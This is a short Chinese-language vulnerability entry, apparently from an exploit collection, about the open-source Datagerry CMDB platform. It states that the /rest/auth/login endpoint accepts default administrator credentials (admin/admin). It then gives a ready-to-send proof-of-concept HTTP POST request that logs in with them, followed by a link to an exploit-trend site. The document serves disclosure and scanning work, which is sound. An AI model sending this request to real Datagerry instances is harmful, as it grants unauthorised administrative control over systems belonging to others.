Datagerry 是一款开源的 CMDB(配置管理数据库)平台,专为 IT 资产管理和基础设施监控设计。该产品提供全面的 IT 资产管理功能,包括自动发现、资产关系映射、配置项管理、变更追踪、工作流管理等核心模块。Datagerry 采用 RESTful API 架构,支持多种数据源集成(LDAP、SNMP、API),提供可视化仪表板和报表功能,广泛应用于企业 IT 运维、资产管理、服务管理和合规审计等场景。Datagerry 的 /rest/auth/login 接口存在默认口令漏洞,系统使用了预设的默认管理员凭证(用户名 admin,密码 admin),攻击者可直接使用这些凭据登录系统,获取管理权限。
PoC
POST /rest/auth/login HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 40
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/ Firefox/3.6.15
Connection: close
Accept-Encoding: gzip
{"user_name":"admin","password":"admin"}
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.